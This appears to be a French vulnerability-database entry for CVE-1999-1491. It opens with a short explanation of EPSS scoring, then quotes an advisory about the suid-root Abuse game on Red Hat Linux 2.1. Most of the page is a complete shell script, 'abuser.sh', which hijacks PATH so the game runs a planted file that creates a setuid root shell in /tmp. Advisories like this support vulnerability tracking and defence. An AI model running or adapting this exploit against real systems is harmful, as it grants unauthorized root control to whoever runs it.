CVE-1999-1491 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/354/info Abuse is a game that is included with RedHat Linux 2.1 in the games package. The console version, abuse.console, is suid-root and will load the program sndrv as root without checking for an absolute pathname. This means that sndrv can be substituted in another directory by a regular user and used to locally execute arbitrary code on the target machine. Consequences are a root compromise. Exploit: #!/bin/sh # # abuser.sh # exploits a security hole in abuse to create # a suid root shell /tmp/abuser on a linux # Red Hat 2.1 system with the games package # installed. # # by Dave M. (davem@cmu.edu) # echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/lib/games/abuse/abuse.console then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/undrv #!/bin/sh /bin/cp /bin/sh /tmp/abuser /bin/chmod 4777 /tmp/abuser _EOF_ chmod +x /tmp/undrv PATH=/tmp echo ================ Executing Abuse /usr/lib/games/abuse/abuse.console /bin/rm /tmp/undrv if test -u /tmp/abuser then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi